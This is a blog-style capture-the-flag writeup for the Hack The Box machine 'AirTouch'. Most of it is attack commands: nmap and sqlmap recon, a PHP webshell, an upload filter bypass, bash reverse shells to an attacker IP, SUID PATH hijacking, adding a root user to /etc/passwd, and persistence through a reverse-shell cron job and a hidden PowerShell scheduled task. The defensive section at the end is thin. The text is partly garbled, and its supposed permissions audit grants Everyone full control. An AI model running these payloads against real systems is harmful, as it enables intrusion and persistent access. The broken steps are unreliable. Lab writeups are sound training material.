Listen to this Post

Introduction:
Hack The Box (HTB) machines like AirTouch simulate real-world vulnerabilities, offering a sandbox to master penetration testing. This writeup dissects the AirTouch challenge, walking through reconnaissance, exploitation, and privilege escalation while teaching essential commands and defensive strategies.
Learning Objectives:
- Perform enumeration and vulnerability discovery on a target Linux-based machine.
- Exploit a web application flaw to gain initial foothold and escalate privileges via misconfigured binaries.
- Apply mitigation techniques including proper file permissions, input validation, and kernel hardening.
You Should Know:
1. Reconnaissance & Enumeration: Discovering Attack Surface
Before exploitation, map the target using Nmap and directory busting. Start with a full TCP port scan:
nmap -p- --min-rate 1000 -T4 10.10.10.10 -oA airtouch_ports
Then run service version and script scans on open ports:
nmap -p 22,80,8080 -sC -sV 10.10.10.10 -oA airtouch_services
Look for web servers. Use `gobuster` to enumerate hidden directories:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -t 50
Step‑by‑step guide:
- Identify open ports (common: 22 SSH, 80 HTTP, 8080 HTTP-Alt).
- Visit the web page; inspect source code and cookies.
- Use `curl` to test for information disclosure: `curl -v http://10.10.10.10/robots.txt`.
- If a login form appears, attempt default credentials or SQL injection manually.
-
Exploiting Web Vulnerabilities: SQL Injection & File Upload
The AirTouch machine often contains a vulnerable contact form or file uploader. Test for SQL injection using sqlmap:
sqlmap -u "http://10.10.10.10/product?id=1" --dbs --batch
If file upload is allowed, attempt to bypass restrictions by double extensions or MIME type spoofing. Create a PHP reverse shell:
<?php system($_GET['cmd']); ?>
Upload as `shell.php.jpg` and use Burp Suite to change Content-Type: image/jpeg. Trigger the shell:
curl "http://10.10.10.10/uploads/shell.php.jpg?cmd=id"
Step‑by‑step guide:
1. Intercept upload request with Burp Suite.
- Change filename to `shell.php` and Content-Type to
application/x-php.
3. If blocked, try `shell.php%00.jpg` (null byte injection).
4. Locate uploaded file path via directory fuzzing.
- Use `curl` or browser to execute commands and confirm RCE.
3. Gaining Initial Foothold: Reverse Shell
Once RCE is achieved, establish a stable reverse shell. Set up a netcat listener on your attacking machine:
nc -lvnp 4444
On the target, inject a reverse shell payload. For Linux target:
bash -i >& /dev/tcp/10.10.14.14/4444 0>&1
URL-encode if needed:
curl "http://10.10.10.10/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.14%2F4444%200%3E%261%27"
Upgrade to a fully interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then press Ctrl+Z, then in your terminal:
stty raw -echo; fg
Then press Enter twice, and:
export TERM=xterm
Step‑by‑step guide:
1. Start listener before sending payload.
2. Test simple command (`whoami`) to confirm execution.
- Use `python3 -c ‘import pty; pty.spawn(“/bin/bash”)’` for stability.
4. Set PATH and SHELL variables if needed.
4. Privilege Escalation: Exploiting SUID Binaries
After landing as a low-privilege user (e.g., www-data), enumerate the system for privilege escalation vectors. Check SUID binaries:
find / -perm -4000 2>/dev/null
Look for uncommon binaries like `airtouch-admin` or custom-backup. If a binary calls system commands without absolute paths, manipulate $PATH:
echo "/bin/bash" > /tmp/ls chmod +x /tmp/ls export PATH=/tmp:$PATH Run the SUID binary /usr/local/bin/airtouch-admin
Alternatively, check writable files owned by root:
find / -writable -type f 2>/dev/null | grep -v /proc
If `/etc/passwd` is writable, add a new root user:
openssl passwd -1 -salt hacker password echo 'hacker:$1$hacker$Tf4R9O4R9O4R9O4R9O4R9.:0:0:root:/root:/bin/bash' >> /etc/passwd
Then `su hacker` with password `password`.
Step‑by‑step guide:
- Run `sudo -l` (if user has sudo rights).
- Examine SUID binaries with `strings` to identify called commands.
- Exploit relative path vulnerability or LD_PRELOAD if allowed.
- Use `pspy` to monitor cron jobs: `./pspy64` (download from GitHub).
- For kernel exploits, run `uname -a` and search on Exploit-DB.
-
Persistence & Lateral Movement: SSH Keys & Cron Jobs
To maintain access, add an SSH key to the target user’s authorized_keys:
On attacker machine ssh-keygen -t rsa -b 4096 -f ~/.ssh/airtouch_key cat ~/.ssh/airtouch_key.pub
On target (as low-priv user):
mkdir -p ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAA..." >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys
Or create a persistent cron job:
echo " /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/4445 0>&1'" >> /var/spool/cron/crontabs/root
For Windows targets (not in this HTB, but relevant for IT), use schtasks:
schtasks /create /tn "UpdateTask" /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAF..." /sc minute /mo 1
Step‑by‑step guide:
- After root, extract hashes from `/etc/shadow` for offline cracking with John or Hashcat.
- Check for stored credentials in
.bash_history, config files, or browser data. - For lateral movement, use `ssh` agent forwarding or `proxychains` to pivot.
6. Mitigation & Hardening (Defender’s Perspective)
To prevent attacks like AirTouch, implement these countermeasures:
- Input validation: Sanitize all user inputs to block SQLi and file upload bypasses. Use prepared statements and allowlist file extensions.
- Least privilege: Run web servers as non‑root users; disable dangerous PHP functions (
exec,system,passthru) inphp.ini. - SUID binary audit: Regularly scan for unexpected SUID binaries using `find / -perm -4000 -ls` and remove unnecessary ones.
- Kernel updates: Keep the kernel patched; use `sysctl` to disable `dmesg` leaks and `ptrace` for unprivileged users.
- Logging & monitoring: Deploy auditd rules to detect suspicious file modifications and `fail2ban` for brute‑force attempts.
Linux command to audit SUID files daily via cron:
0 2 find / -perm -4000 2>/dev/null > /var/log/suid_audit.log
For Windows, use `icacls` to check for insecure file permissions:
icacls C:\ProgramData\ /grant "Everyone:F" /T Then revert: icacls C:\ProgramData\ /remove "Everyone"
What Undercode Say:
- Key Takeaway 1: HTB AirTouch teaches that low‑hanging fruits – SUID misconfigurations and unvalidated file uploads – remain the most common entry points to root.
- Key Takeaway 2: Combining automated tools (nmap, sqlmap) with manual creativity (path hijacking, cron abuse) yields reliable privilege escalation.
Analysis: The AirTouch writeup underscores a recurring pattern in CTF machines: web vulnerabilities lead to user access, and poor system hygiene (writable binaries, PATH injection) gives root. Real‑world red teams exploit exactly these oversights. Defenders must adopt secure coding practices, regular SUID audits, and runtime detection of anomalous command execution. The proliferation of AI‑assisted code generation makes input validation even more critical, as LLMs often produce vulnerable snippets without explicit security directives.
Prediction:
As AI‑generated code becomes standard, misconfigured SUID binaries and unsafe file upload logic will spike unless automated security scanners integrate with CI/CD pipelines. Expect HTB and similar platforms to introduce AI‑powered challenges where attackers must poison training data or evade model‑based WAFs. The AirTouch methodology will evolve into exploiting ML model serialization (pickle, joblib) and cloud metadata endpoints, shifting the battleground from local binaries to API‑driven privilege escalation.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: 0xfrost Htb – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


